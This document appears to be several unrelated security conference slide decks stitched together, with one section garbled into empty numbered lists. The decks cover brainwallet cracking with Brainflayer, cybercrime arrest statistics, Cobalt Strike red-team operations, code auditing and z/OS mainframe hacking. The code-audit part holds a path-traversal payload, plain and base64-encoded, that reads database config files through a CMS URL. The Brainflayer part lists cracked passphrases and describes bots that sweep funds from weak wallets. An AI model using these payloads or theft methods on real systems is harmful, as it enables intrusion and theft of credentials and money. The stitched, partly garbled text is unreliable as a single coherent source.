Introducing Brainflayer
● Does about 100,000 passphrases per
second on my quad core i7 3.5GHz
● Using EC2 spot instances would cost about
$700 to check a billion passphrases
● A mid-sized botnet with a million nodes, each
trying 10,000 passphrases per second, could
check nearly 10^15 (~2^49.5) in a day
Introducing Brainflayer (cont’d)
● At that speed a passphrase of four random
common English words falls in about an hour
● Low level optimization and fancy math are
not my thing, but there is plenty of room for
improvement here even without GPGPU
● Has a lookup table generation mode
● Crack multiple cryptocurrencies at once
How Brainflayer works
● We need to go from passphrase to Hash160
and check if that Hash160 has been used
● I got about a 10x speed increase switching
to libsecp256k1 to generate the public key
● Quickly checking if a Hash160 has ever
received money can be done with a data
structure called a bloom filter
Bloom filter?
● A space-efficient probabilistic data structure
● Consists of a large array of bits
● To add an item, hash that item n ways and
set n corresponding bits
● To check if an item is present, hash that item
n ways - if all n corresponding bits are set
then it probably is.
Probably?
● The error rate can be made quite small
● Most of the time we’re getting a “no” and we
want that to be fast
● The “probably” can be fully verified later
Isn’t running more hashes slow?
● Yes, even the non-cryptographic ones
● So we don’t run more hashes
● Our items are already hashed
● Just slice and dice the bits, which is fast
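A minimal sketch of that bit-slicing bloom filter in Python. The filter size, the slice count and the SHA-256-derived 20-byte stand-in for Hash160 are illustrative assumptions, far smaller than what Brainflayer actually uses:

```python
import hashlib

M_BITS = 2 ** 20   # filter size in bits (toy-sized for the example)
N_SLICES = 5       # bit positions checked per item

def bit_positions(item_hash: bytes):
    # The item is already a hash (a 20-byte Hash160 in the real pipeline),
    # so instead of hashing it n more ways we just slice off n chunks.
    for i in range(N_SLICES):
        chunk = item_hash[i * 4:(i + 1) * 4]
        yield int.from_bytes(chunk, "big") % M_BITS

class BloomFilter:
    def __init__(self):
        self.bits = bytearray(M_BITS // 8)

    def add(self, item_hash: bytes) -> None:
        for pos in bit_positions(item_hash):
            self.bits[pos // 8] |= 1 << (pos % 8)

    def maybe_contains(self, item_hash: bytes) -> bool:
        # All n bits set: "probably yes" (verify later); any bit clear: definite no.
        return all(self.bits[pos // 8] & (1 << (pos % 8))
                   for pos in bit_positions(item_hash))

# Stand-in for a funded address's Hash160 (really RIPEMD160(SHA256(pubkey))):
funded = hashlib.sha256(b"demo pubkey").digest()[:20]
bf = BloomFilter()
bf.add(funded)
```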
Building a phraselist
● Song lyric sites, Wikiquotes, Wikipedia,
Project Gutenberg, forums, reddit, etc.
● Needs normalization, then normalized lists
can have rules applied to them
Example cracked brainwallets
● Zed's dead baby. Zed's dead.
● 22Jan1997
● Am I invisible because you ignore me?
● antidis3stablishm3ntarianism
● youaremysunshinemyonlysunshine
● The Persistence Of Memory
● toby102
● permit me to issue and control the money of a nation
and i care not who makes its laws
Everyone loves demos.
<INSERT DEMO HERE>
What’s already happening?
● There appear to be at least four currently
active brainwallet thieves, probably more
● Send funds to a particularly weak brainwallet
and they’ll be gone in seconds
● Lookup tables for large numbers of
passwords have clearly been built
● Adaptive behaviour has been observed
● Cracking speeds unclear
Lookup tables?
● There is competition for weak brainwallets
● Must be fast, rainbow tables too slow
● Use your favorite key-value store
● Truncate the Hash160 (64 bits, save space)
● Store the passphrase or private key,
whichever is shorter
● A $120 4TB disk will store 2^36 passphrases
Lookup tables? (cont’d)
● Monitors for transactions
● Check addresses against key-value store
● LRU cache in front of key-value store
● On a hit, use the private key to make a new
transaction taking the funds
● Do this faster than others trying to do the
same
● I have not built any of this, but it exists
SUPER SECRET SECOND DEMO
<INSERT DEMO HERE>
1.
2. xxx
3. xxx
ED
1. TCP/IP, Windows/Linux, Python
2. Java web, Java, IoT
3. Kali, nmap, sqlmap, Burp Suite, IDA
->->->->->->->->
->->->
MMORPG
web
app, pwn
web src, PHP
Java
web
sxf VPN
1. sxf VPN
2. VPN
3.
4. VPN, PHP, Apache, Node.js
5.
6.
1.
2.
3.
4.
5.
1.
2.
3.
1.
2.
3.
4.
5. p
p
6.
7.
8.
9.
10. CMS
“Cyber” Who Done It?!
Attribution Analysis
Through Arrest History
Jake Kouns, CISO
[email protected]
@jkouns
August 2016
Lee Johnstone
Security Researcher
@83leej
NOT JUST SECURITY, THE RIGHT SECURITY
cyber
Cyber? Drink!
Looking Back At The Last Five Years
Source: CyberRiskAnalytics.com
2015 – Threat Vector
Source: CyberRiskAnalytics.com
2015 – Breach Types
Source: CyberRiskAnalytics.com
2015 Analysis – Country By Records
Source: CyberRiskAnalytics.com
2016 Year To Date
Attribution
Who is behind all of these
data breaches?
Attribution
What Does This Really Mean?
Attribution
What is Attribution?
• In social psychology, attribution is the
process by which individuals explain the causes
of behavior and events.
• Attribution, in copyright law, is
acknowledgement as credit to the copyright
holder of a work.
• The attribution of information to its Source
(journalism)
Source: Wikipedia
Cyber Attribution
Cyber Attribution
Cyber Attribution
Why Do People Care About Attribution?
Why Do People Care About Attribution?
Sony Pictures – The Interview
December 2014
INSERT
Sony Hack Attribution Generator
Sony Hack Attribution Generator
Sony Hack Attribution Generator
WhoHackedUs.com
Cyber Attribution Dice
Cyber Attribution Dice
Attribution 8 Ball
Attribution 8 Ball – Duo
Attribution 8 Ball – SecuriTay
Attribution 8 Ball – Threatbutt
Sony Pictures – The Interview
Sony Pictures – The Interview – Who?
Norse – Sony
• While Norse is not involved in the Sony case, it has
done its own investigation, and stated “We are very
confident that this was not an attack master-minded by
North Korea and that insiders were key to the
implementation of one of the most devastating attacks
in history”. Stammberger says Norse data is pointing
towards a woman who calls herself “Lena” and claims to
be connected with the so-called “Guardians of Peace”
hacking group. Norse believes it’s identified this woman
as someone who worked at Sony in Los Angeles for ten
years until leaving the company this past May.
Marc Rogers – Sony
Marc Rogers
http://marcrogers.org/2014/12/18/why-the-sony-hack-is-unlikely-to-be-the-work-of-north-korea/
Kim Zetter – Sony
Crowdstrike (Dmitri) – Sony
PBS – Cyber Attribution Debate Live!
FBI – Sony
Lots of Debate – Main Two Players!
Who Is Right? Who Is Wrong?
If evidence ends up being released, and there is clear
attribution, how will this impact companies like Norse
and Crowdstrike that have made such bold
statements? If a company making this statement is
blatantly wrong, does that suggest threat intelligence
they sell can’t be trusted or relied on by corporations?
FBI
Krebs on Norse Imploding
Norse @ RSA
Norse – Attack Map
Threatbutt Hacking Attack Attribution Map
Cyber Attribution
Why Is It So Hard?
Attribution Is Hard
• Cyberspace does have some unique attributes which are not
mirrored in the real world.
– Typical CSI forensic / investigation work not possible
• Easy to “spoof” evidence
• Easy to use or embed others’ work (tools, exploits, malware)
– Just because it was used doesn’t mean that it was the same people
– It could easily be used by different people/groups
• Nonexistence of physical “territory”
– Some attribution markers used in other areas such as warfare are
missing.
– Hackers typically don’t need an ‘assembly zone’ that can be
detected and watched.
– No ground boundary needs to be crossed
– No way to track back a “missile” launch without question
DNC Hack
Give Hillary Money For Cybersecurity
DNC – Attribution – Guccifer
DNC – Attribution – Russia
DNC – Attribution – Russia
DNC – Attribution – Person or Russia?
DNC – Russia – Hack Back
DNC – Russia – Hack Back
DNC – Russia – Hack Back
Attribution Matters?
Does it actually matter
that we get Cyber
Attribution correct?
Attribution – North Korea
Attribution – North Korea
Attribution – North Korea
Attribution – Russia
Attribution Is Hard?!
So how can we actually figure out
who is behind these “hacks”?
• No security firm typically agrees on who’s done it
• Can’t trust when people are “claiming” attacks
• Easy to hide IP addresses via Proxy servers, TOR, etc.
• Correlations between certain pieces of malware aren’t
hard evidence (debatable)
• Information (evidence) not shared to protect sources
• Using a “behavioral analysis unit” of FBI experts trained
to psychologically analyze foes based on their writings
and actions isn’t hard evidence
Attribution Is Hard?!
Do we need to improve
our Cyber Attribution
Capabilities?
Can We Improve?
Arrest Tracker
What Is It?
Arrest Tracker
Arrest Tracker
Founded by Lee Johnstone
– Security Researcher
– Founder Cyber War News
Arrest Tracker
• Arrest Tracker (https://arresttracker.com/)
– Started in 2013 by Lee J
– The project aims to track computer intrusion incidents
resulting in an arrest, detaining of a person or persons, seizure
of goods, or other related activities that are directly linked to
computer crimes.
• Track incidents from all types of “cyber” crime (drink!)
and hacking related incidents.
• The Arrest Tracker project currently has 1,431 incidents
collected as of 7/29/2016.
• More than just “arrests”, Cyber Crime Incident Tracker
• Project is officially launching as of today!
Arrest Tracker – Fields
Arrest Tracker
What Can It Help Us With?
Arrest Tracker Disclosures
We need to first recognize there
are limitations with the data!
Arrest Tracker Disclosures
We must also remember that this
is based on mostly ARREST
incidents, therefore it tells a story
from that viewpoint.
Expanded to include more Cyber
Crime and will continue to add
more!
Arrest Tracker Disclosures
We are using data based on
reported arrests and raids.
We must also remember, in
many cases, governments
would rather track and follow
criminals, rather than arrest
them for various reasons.
What Can Arrest Tracker Tell Us?
• Provide detailed computer crime arrest information
and statistics
• Who is behind these data breaches and cyber crime
• What are the demographics?
• Extraditions
• Details on Sentences
• Details on Monetary fines
• Learning about law enforcement
• Profile of a “hacker”
• More!
Face Of A “Hacker”
Face Of A “Hacker” – Google Images
Face Of A “Hacker” – Mr Robot
Real Faces of Cyber Crime – Arrest Tracker
Cyber Arrests
Timeline
Timeline
Timeline
Timeline
• Cyber Incidents in past decades:
– 1970’s: 2 incidents
– 1980’s: 37 incidents
– 1990’s: 59 incidents
– 2000’s: 345 incidents
– 2010’s: 988 incidents
Early Crime Research
1970’s – First Known Arrest
• Oldest Incident in Arrest Tracker is from 1971.
– Hugh Jeffery Ward
– 1971-02-19
1970’s – First Known Arrest
• Hugh Jeffery Ward
• Incident Occurred: 1971-02-19
• 29 years old at the time
• Accused of breaking into I.S.D computer systems
and stealing data.
• Trade Secret Theft
• Plead Guilty
• Fined $5,000
• 36 Months of Probation
Most Friends On The Internet
It’s Tom!
1980’s – MySpace Tom
1980’s – MySpace Tom
1980’s – MySpace Tom
• Tom Andersen aka Lord Flathead
– Aka Myspace Tom
– 1985-10-01
1980’s – MySpace Tom
• Tom Andersen aka Myspace Tom
• 1985-10-01
• 14 or 16 years old at the time
• Hacked into Chase Manhattan bank and told friends
how to do it.
• FBI raid in California and as a result had all
computers seized by federal authorities.
• No charges or criminal convictions have ever been
made in relation to this incident.
– He was a minor at the time.
Many Stories To Be Told
Each incident in Arrest
Tracker has a story to
be told.
1990’s
Kevin Mitnick
Max Butler
Kevin Poulsen
2000’s
Albert Gonzalez
Adrian Lamo
Jeanson James Ancheta
Owen Thor Walker
Jonathan Joseph James
2010’s
Aaron Swartz
Sabu
Barrett Brown
Weev
Other Notable Arrests
Many other notable arrests for various reasons:
• First prosecution of a particular type of crime
• Severity of the crime
• Length of jail time or fines
• Over reaching regulatory actions
• Impact to those accused
• Etc.
Arrest Tracker
Statistics
?
Age
• Youngest Arrest
– 12 Years Old
– Traded pirated
information to the
hacktivist group
Anonymous for video
games.
Age
• Oldest Arrest
– John McHugh aka Devilman
– 66 Years Old
– Busted for selling cards on
the dark web.
Age
Age
Average Age Is Currently
27.
Age
Gender Statistics
Gender Statistics
Male – 1,122 (81.8%)
Female – 33 (2.4%)
Unknown – 215 (15.6%)
Nationality
Which Countries Do
Most Hackers Reside In?
aka
Country of Origin For
Arrest
Nationality
Nationality – Based On Arrests
Collectives
• Total of 58 known collectives that have had a
confirmed incident:
– Anonymous: 130
– Western Express Cybercrime Group: 17
– Legion Of Doom: 16
– Pirates with Attitudes: 15
– Masters of Deception: 8
– Nihilist Order: 7
– LulzSec: 7
– Chaos Computer Club: 6
Operations
• Total of 21 known Hacker Operations that
have had a confirmed incident:
– OpPayBack: 21
– OpPayPal: 14
– Antisec: 7
– OpTitstorm: 4
– OpItaly: 2
– OpScientology: 2
Arrest Inevitable?
Are You Definitely Arrested?
Data Breaches vs Arrests
• ~2,000 data breaches 2016 YTD
– 70 confirmed arrests YTD
• ~4,000 data breaches in 2015
– 134 confirmed arrests
• ~3,000 data breaches in 2014
– 47 confirmed arrests
• Nowhere near the “arrests” based on the
amount of data breaches
Crime To Incident
The data so far shows
there are 610 days on
average between the
“crime” and the incident or
arrest.
Days Of The Week – Most Likely To Be Arrested
Days Of The Week – Monday
Months Of The Year – Most Likely To Be Arrested
Months Of The Year – Most Likely To Be Arrested
Countries Pursuing Cyber Crime
• As most can easily guess, the USA is the most active in
computer crime enforcement.
• But the Top 10 might surprise you!
Countries – Extradition
• Extraditions:
– Currently, only the USA has any extraditions tracked.
• 42 total
– Top 5 Countries
• Russia to United States: 8
• Romania to United States: 7
• Estonia to United States: 6
• Canada to United States: 3
• United Kingdom to United States: 3
• Not every country allows the USA to extradite:
– The United States has extradition treaties with more
than 100 countries.
Countries – Extradition
United States of America (shown in purple) has extradition treaties with the countries
shown in light blue
Jail Time
• Longest Jail Time
– 334 years!
• Onur Kopçak, Turkey
• Created fake websites that impersonated banks in order to
steal people’s banking details in a phishing scam
Fines
• Average Fine
– ~1 Million USD
• Most Common Fine
– $5,600 (occurred 13 times)
• Largest Fine
– Viktor Pleshchuk
– $8.9 Million USD
– Worldpay hacker, convicted and tried in Russian court
under FBI charges.
Once Arrested, How Many Are Arrested Again?
• Some people just can’t stop themselves
• Many times multiple cases over years are
consolidated into one case
• But confirmed that 17 People have had
Multiple Arrests
Once Arrested, How Many Assist Authorities?
• We are asked all the time how many
people are assisting the authorities.
• Arrest Tracker does have fields to track
this; however, it is extremely rare and
hard to find this data for most incidents.
• Currently, there are 30 persons that are
confirmed to have Assisted Authorities.
Cyber Crime
What Is The Profile Of A “Hacker”?
Profile Of A Hacker
The data suggests there is
no single type of “Hacker”
or Cyber Criminal.
Profile Of A Hacker – TELL US!
• Gender: Male
• Age: 27 (on average)
– Range between 18 and 35
• Location: USA
– If not, then UK or Philippines
• Crime: Hacking
– If not, then Cyber Fraud, or Data Theft
• Active Since 2000
• Motivation: Still Unclear
Most Wanted
Who Hasn’t Been Arrested Yet?
FBI’s Most Wanted
• https://www.fbi.gov/wanted/cyber
• 26 Total Listed As Of 8/1/2016
FBI’s Most Wanted – Profiles
FBI’s Most Wanted – Profiles
FBI’s Most Wanted – Profiles
FBI’s Most Wanted
FBI’s Most Wanted
FBI’s Most Wanted
Ghostshell Revealed
Ghostshell Revealed
• Revealed in March 2016 but still active!
So What’s Next?
Actions
Arrest Tracker Data
Arrest Tracker Future
• We are still working to ensure we are
using the best data
• If you find something wrong, please
contact us.
• We care about the data and want it to
be accurate.
• We want more data!
– Increase coverage of cyber crime incidents
– More data fields per incident and by person
Arrest Tracker Future
Future ideas/features:
• Add more tracking data about individual persons
– Ability to handle complex cases such as: Romanian nationality,
lived in Canada for 15 years, then arrested in USA
– Add ability to track motivation
– Add mapping to Data Breaches
• More work on “Most Wanted”
– How long they were FBI most wanted, until arrested.
• Where are they now information?
– How many work for security companies?
• Subsection for piracy related cases
Arrest Tracker Future
• What comes next?
– Will we see arrests increase or decrease?
– Will we see changes in legal environments
leading to more arrests?
• Can we take Arrest Tracker information and
apply it to your work!
• What new features / ideas do you want to
see?
– Open to feedback!
• And if you want to help…
– Please contact us!
Thank you!
• Lee Johnstone (RBS)
• Brian Martin (RBS)
Red Team Ops with CS: Operations
0x00 Preface
Raphael Mudge, the author of Cobalt Strike, has two public video courses that are well worth
studying: "In-memory Evasion" from 2018 and "Red Team Operations with Cobalt Strike" from 2019.
A while back I rewatched In-memory Evasion and took notes, but I had never watched Red Team
Operations with Cobalt Strike from start to finish, so this time I went through it in one sitting.
When studying, always take notes, and whatever can be turned into a tool should be written as a tool.
The "Red Team Operations with Cobalt Strike" course is divided into 9 parts:
Operations
Infrastructure
C2 (Command and Control)
Weaponization
Initial Access
Post Exploitation
Privilege Escalation
Lateral Movement
Pivoting
In the first part, Operations, the author first walks through the whole attack chain, using email
phishing as the example, along with the defenses at each link of the chain; then explains his
"evasion philosophy"; and finally covers some operations-related knowledge about Cobalt Strike.
0x01 The attack chain and the corresponding defenses
The author uses email phishing to illustrate the whole attack chain. Phishing has always been the
most common initial-access technique in APT campaigns, which makes it a perfect example. The
figure below is my summary of the whole attack chain and the matching defenses:
It really is running a gauntlet. A malicious phishing email has to get past the following defenses:
If DMARC, DKIM, SPF and the like are not configured properly on your sending mail server,
anti-spam and anti-phishing filters will very likely block the mail automatically.
A mail antivirus gateway or sandbox will automatically open your attachment or visit the URLs
in the mail and judge whether they are malicious.
Once the attachment lands on disk, all kinds of endpoint security products (A/V) run a round of
static and simple dynamic analysis on it.
If the host enforces an application whitelisting policy, this executable of unknown origin also
has to bypass that policy, with tricks such as DLL side-loading.
Once the implant runs, it performs all sorts of process, thread and memory operations; antivirus
products and EDRs record these behaviors, and the slightest carelessness trips a malicious-behavior
rule, followed by interception and reporting.
Past that hurdle comes the egress problem: firewall policies, proxy-only Internet access, domain
categorization, domain whitelists and similar controls all restrict C2 egress.
Produced by AttackTeamFamily - Author: L.N. - Date: 2021-09-28
No. 1 / 5 - Welcome to www.red-team.cn
Meanwhile, network monitoring devices keep analyzing the traffic, and any traffic anomaly may
trigger an alert.
Even past all of that, threat intelligence keeps analyzing domains, IPs, samples and so on; for
example, your C2 TeamServer gets fingerprinted by Internet-wide scanning, and the IP ends up flagged.
Once the implant is up and calling back normally, post-exploitation begins: lateral movement,
screenshots, keylogging, local information gathering, network information gathering and so on.
Every single action may be detected by an EDR and flagged as malicious by cloud-side machine
learning or human analysis.
To complete a successful red team operation, you must fully bypass all the defenses up front, and
also plan for persistence afterwards, so that cloud-side sample analysis does not cut the implant's
lifetime too short.
0x02 Evasion philosophy
This part resonated with me strongly. The author's points:
Cobalt Strike is not a magic wand; it cannot defeat every defense and scenario you encounter.
But: Cobalt Strike provides choices + extensibility.
How to evade (Evasion) successfully:
Understand the tools you use and the behavior they produce (know yourself).
Evaluate and understand the defensive mechanisms (know your enemy).
Make the best possible choice, then execute (evaluate and execute).
These three points on successful evasion really describe a red teamer's growth path: first learn to
understand and use the various attack tools, then learn and understand the defensive mechanisms,
then modify your attack methods to bypass them, and finally, knowing both yourself and the enemy,
make the best choice. A red team operation is completed by endlessly repeating the loop of
"understand the target, choose an attack method, decide and execute".
0x03 Cobalt Strike operations knowledge
CS's mission and vision
Mission: bridge the gap between penetration-testing tools and advanced threat malware
Vision: a useful, credible adversary emulation tool
Develop battle-hardened security analysts
Drive objective and meaningful security improvements
Train security professionals and decision makers in advanced threat tactics
Distributed operations
The author shares some best practices: split duties across multiple TeamServers.
He recommends standing up three separate TeamServers for different purposes:
Staging
The TeamServer used while gaining initial access, whether through phishing or some other route.
You will run privilege escalation, lateral movement and similar operations through it, and since
you are not yet familiar with the target environment, you will inevitably trip alerts. The odds
of this TeamServer being discovered are essentially 100%, so before that happens, move laterally
to other machines as fast as possible and stand up the long-haul TeamServer, what we would call
the dormant channel.
long haul
The dormant channel performs essentially no operations and stays alive for the whole lifetime of
the red team engagement, so that when other channels fail it can still bring up new post-ex
channels.
The dormant channel keeps a slow callback frequency.
post-ex
The post-exploitation channel: the one used to run commands and perform lateral movement.
That is the best practice for a single target. For red team assessments serving several targets at
once, the author offers the following best practice:
Target Cell
Responsible for a specific target network
Initial access, post-exploitation and lateral movement
Maintains this target's engagement infrastructure
Access Management Cell
Holds the access for all target networks
Acquires access itself and receives access handed over by Target Cells
When a Target Cell loses its access, supplies it with fresh access
Maintains the global infrastructure for persistent callbacks
Team staffing
In today's high-intensity offense-defense confrontation, a single person can hardly finish a large
volume of assessment and exercise work in a short time, so team-based operations are a given. The
author gives his own thinking and best practices.
Access team
Mainly initial foothold acquisition; their main work is weaponization for initial access and
weaponization for lateral movement.
Post-Exploitation team
Mainly information gathering, data mining, user monitoring, keylogging, screenshots and so on,
hunting for the final objectives (crown jewels) in the target network.
Local Access Manager (shell Sherpa), the access maintenance team
Manages callbacks
Configures infrastructure
Maintains persistent access
Stays in communication with the Access Management Cell
This staffing plan describes a Target Cell. No wonder; this experience comes from a guy who came
out of the US Air Force, clearly someone who has seen large operations. Each "team" above may be
one person or several. The access maintenance team communicates with the global Access Management
Cell. Looking at the overall staffing, a great deal of people and effort is invested in access
control, which fits the reality that keeping access is the hard part of the whole operation.
0x04 Summary
This first part actually does not contain much that is specific to Cobalt Strike; most of it is
about red teaming, and it is very solid material, from the attack chain to red team staffing, with
many conclusions distilled from hands-on experience. I got a lot out of it. I left out the video's
basic introductions to Beacon, Malleable C2, Aggressor Script, and logging and reporting. Overall,
this part is the author's best practices summarized from experience, well worth studying, and a
valuable reference in both red team assessments and attack-defense exercises; configure your team's
technical capabilities flexibly according to your own team's actual situation.
Who am I
Name: Dong Hongchen (董弘琛)
ID: Yuebai (月白)
A post-90s white hat and network security expert at 360, skilled in penetration testing, code
audit, script development and related security skills. Rich experience in security services for
the financial industry; I hope to exchange and learn more with all of you.
My thanks as well to my leaders, my team and the organizers for their help and support.
Let's talk about code audit first
What is code audit?
Why do code audit?
How is code audit done?
What is code audit
Examining source code for security defects: checking whether the program source carries security
risks or non-standard coding, inspecting and analyzing the source code item by item with automated
tools or manual review, finding the security vulnerabilities these code defects introduce, and
providing code fixes and recommendations.
What is code audit
In short: looking for security risks in the code
What risks?
How do we find them?
Why code audit
Network security risk
White-box testing
The returns of code audit
How to do code audit
The basic code audit workflow
Confirm the audit target
Identify the language, framework and version information the system uses, the development
documentation, and so on. Build a clear understanding of the system's code.
Audit and find vulnerabilities
Combine automated tools with manual review for an audit that is both efficient and meticulous.
Summarize and provide a remediation plan
Summarize the vulnerabilities found, give the corresponding remediation plans, and assist with
the fixes.
Retest or audit periodically
Code is never set in stone, and neither are vulnerabilities; periodic code audits matter just
as much.
Difficulties in code audit
Many languages, used in combination
Messy code, complex structure
..\\..\\..\\App\\Common\\Conf\\db.php
Li5cXC4uXFwuLlxcQXBwXFxDb21tb25cXENvbmZcXGRiLnBocA==
http://127.0.0.1/xyhai.php?s=/Templets/edit/fname/
Li5cXC4uXFwuLlxcQXBwXFxDb21tb25cXENvbmZcXGRiLnBocA==
..\\..\\..\\App\\Common\\Conf\\config.php
Li5cXC4uXFwuLlxcQXBwXFxDb21tb25cXENvbmZcXGNvbmZpZy5waHA=
http://127.0.0.1/xyhai.php?s=/Templets/edit/fname/
Li5cXC4uXFwuLlxcQXBwXFxDb21tb25cXENvbmZcXGNvbmZpZy5waHA==
The security backdrop of the financial industry
Accelerating digitalization
A rapid shift from offline to online
Increasingly strict and detailed regulatory requirements
A further-refined system of rules
Security risks in the financial industry
Vulnerability threats
Attack threats
The code itself
Frequent attacks, vulnerabilities dug up ever faster, zero-days everywhere
No holds barred: organized and globalized attack groups
Risks planted the moment the code is produced
Common security vulnerabilities in the financial industry
SQL injection
SQL injection: JDBC, Hibernate, MyBatis
Cross-site scripting
Stored XSS, reflected XSS, DOM-based XSS
Command injection
Untrusted data causes the program to execute malicious commands
HTTP response splitting
Untrusted data placed into HTTP headers and sent out
Password management
Hard-coded passwords, plaintext passwords in config files, weak encryption
XML injection
Unvalidated data written into XML documents
Path traversal
Untrusted data used to build a path
XML external entity injection
Processing unsafe external entity data
Dynamic code evaluation
Source instructions parsed dynamically at runtime are open to attack
Component vulnerabilities
Using components with known vulnerabilities
SQL injection: JDBC
Concatenated SQL statements
Parameterized queries
Ineffective parameterized queries
User input
taken directly as part of the SQL command
First compile the SQL statement with placeholders
Then bind the user input to the placeholders
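The deck's examples are Java/JDBC; the same contrast can be sketched in Python with the stdlib sqlite3 driver (the table, data and payload below are hypothetical):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'admin'), ('bob', 'user')")

user_input = "alice' OR '1'='1"  # classic injection payload

# Vulnerable: user input is concatenated straight into the SQL text,
# so the payload rewrites the WHERE clause and returns every row.
unsafe_sql = "SELECT role FROM users WHERE name = '" + user_input + "'"
unsafe_rows = conn.execute(unsafe_sql).fetchall()

# Safe: the statement is compiled with a placeholder first, and the input
# is bound afterwards as pure data; it can never change the query shape.
safe_rows = conn.execute(
    "SELECT role FROM users WHERE name = ?", (user_input,)
).fetchall()
```

An "ineffective parameterized query" is the in-between trap: a prepared statement whose text was itself built by concatenating user input, which removes all of the protection.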
SQL injection: MyBatis
In MyBatis, XML files or annotations are used for configuration and mapping, mapping
interfaces and Java POJOs to database records
• Greatly simplifies most JDBC code, manual parameter setting and result retrieval
• Flexible: the user keeps full control of the SQL, with support for advanced mappings
MyBatis XML
Mapper Interface
XML configuration file
#{ }
${ }
#{ }
${ }
There are cases where #{ } cannot be used directly:
ORDER BY
LIKE
IN
So how do we avoid using ${ }?
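One common set of workarounds, sketched here in framework-agnostic Python (in MyBatis the same checks would sit in front of the mapper; the table and column names are illustrative): whitelist ORDER BY columns, escape and bind LIKE patterns, and generate one placeholder per IN element.

```python
# ORDER BY: a column name cannot be bound as data, so validate it
# against a whitelist before splicing it into the statement.
ALLOWED_SORT_COLUMNS = {"name", "created_at", "balance"}

def build_order_by(user_column: str) -> str:
    if user_column not in ALLOWED_SORT_COLUMNS:
        raise ValueError("unsupported sort column")
    return "SELECT * FROM account ORDER BY " + user_column

# LIKE: escape the wildcard metacharacters in the user's term, then
# bind the whole pattern as an ordinary parameter.
def build_like(user_term: str):
    escaped = user_term.replace("%", r"\%").replace("_", r"\_")
    sql = "SELECT * FROM account WHERE name LIKE ? ESCAPE '\\'"
    return sql, ("%" + escaped + "%",)

# IN: generate one placeholder per element instead of splicing a raw list.
def build_in(values):
    placeholders = ", ".join("?" for _ in values)
    return f"SELECT * FROM account WHERE id IN ({placeholders})", tuple(values)
```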
SQL Injection: Hibernate
With Hibernate you only manipulate objects, which makes development more object-oriented; it abandons the database-centric mindset for a fully object-oriented one, with concise HQL on top.
Thought you could forget about me?
HQL injection
Positional parameters
Named parameters
Class instances
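Hibernate's positional and named parameters have direct analogues in most database APIs. The sketch below illustrates both binding styles with the standard-library sqlite3 module rather than Hibernate itself (the table and data are invented):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE account (owner TEXT, balance INTEGER)")
conn.execute("INSERT INTO account VALUES ('alice', 100), ('bob', 50)")

# Positional parameter, analogous to an HQL positional parameter.
rows_positional = conn.execute(
    "SELECT balance FROM account WHERE owner = ?", ("alice",)).fetchall()

# Named parameter, analogous to HQL's ":owner" style.
rows_named = conn.execute(
    "SELECT balance FROM account WHERE owner = :owner", {"owner": "bob"}).fetchall()

print(rows_positional, rows_named)  # [(100,)] [(50,)]
```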
Path Traversal
Component Security
The security risks of open-source components
Component vulnerabilities are:
hard to enumerate: systems contain large numbers of components in varying versions;
hard to maintain: some components are no longer updated, or update slowly;
hard to fix: some component vulnerabilities are difficult, or take a lot of time and effort, to fix.
The security protection of security components
Component category: component names
Business-function security components: secure file upload, secure file download, password recovery, multi-step submission, data masking, anti-tampering
Attack-protection security components: anti SMS bombing, anti replay, anti unauthorized access
Security tool components: cookie protection, encryption algorithms, token, random number generator, business security logging, encoding
Attack-protection security components: anti SQL injection, anti XSS, anti scanner, anti direct object reference
Code Security Solution
Prevention first: integrate code security into the system's entire security lifecycle.
Requirements -> Design -> Implementation -> Testing -> Release
Share of IT spending vs. share of network-security spending (data from the Financial Industry Network Security White Paper)
Code audit and analysis platform
Code security solution
酒仙桥六号部队 (Jiuxianqiao Unit 6)
Personal WeChat
雪狼别动队 (Snow Wolf Task Force)
© WAVESTONE
Ayoub ELAASSAL
[email protected]
@ayoul3__
Dealing the perfect hand
Shuffling memory blocks on z/OS
What people think of when I talk about
mainframes
The reality: IBM zEC 13 technical specs:
• 10 TB of RAM
• 141 processors, 5 GHz
• Dedicated processors for JAVA, XML and
UNIX
• Cryptographic chips…
Badass Badass Badass !!
So what… who uses those anymore?
https://mainframesproject.tumblr.com
About me
Pentester at Wavestone, mainly hacking Windows and Unix stuff
First got my hands on a mainframe in 2014…Hooked ever since
When not hacking stuff: Metal and wine
•
github.com/ayoul3
•
ayoul3__
This talk
Why we should care about mainframes
Quick recap on how to execute code on z/OS
Playing with z/OS memory layout
Quick recap on how to execute code on z/OS
Sniffing credentials
Good ol’ bruteforce
Go through the middleware
And many more (FTP, NJE, etc.)
Check out Phil & Chad’s talks !
The wonders of TN3270
The main protocol to interact with a mainframe is called TN3270
TN3270 is simply a rebranded Telnet
…Clear text by default
X3270 emulator if
you don’t have the
real thing
The wonders of TN3270
Damn EBCDIC
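The EBCDIC problem is easy to reproduce off-host: Python ships IBM EBCDIC codecs such as cp037, so sniffed TN3270 bytes can be made readable with a one-line conversion. A small sketch:

```python
# Convert between ASCII and EBCDIC (code page 037), the step any TN3270
# dissector must perform before sniffed traffic becomes readable.
ebcdic = "LOGON".encode("cp037")
print(ebcdic.hex())            # not the ASCII byte values you'd expect
print(ebcdic.decode("cp037"))  # LOGON
```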
Ettercap dissector by @Mainframed767
[DEMO ETTERCAP]
Quick recap on how to execute code on z/OS
Sniffing credentials
Good ol’ bruteforce
Go through the middleware
And many more (FTP, NJE, etc.)
Check out Phil & Chad’s talks !
Time Sharing Option (TSO)
Tsk tsk tsk… too friendly!
TSO is the /bin/bash on z/OS
Bruteforce
Nmap script by @Mainframed767
Bruteforce is still surprisingly effective
Passwords derived from login
Windows : 5%
Mainframe : 27%
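A login-derived wordlist of the kind behind those statistics takes only a few lines to sketch; the mutation rules below are my own assumptions, and the 8-character cap reflects the classic TSO password limit:

```python
def derived_candidates(login: str):
    """Hypothetical login-derived password guesses of the kind that matched
    27% of mainframe accounts in the slide's statistics.
    (TSO passwords are classically capped at 8 characters.)"""
    base = login.lower()
    guesses = [base, base.upper(), base.capitalize(),
               base + "1", base + "123", base + "2017"]
    return [g[:8] for g in guesses]

print(derived_candidates("ayoub"))
```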
Quick recap on how to execute code on z/OS
Sniffing credentials
Good ol’ bruteforce
Go through the middleware
And many more (FTP, NJE, etc.)
Check out Phil & Chad’s talks !
Interactive applications
CICS is a combination of Drupal and Apache Tomcat… before it was cool (around 1968)
Current version is CICS TS 5.4
Most interactive applications on z/OS rely on a middleware
called CICS
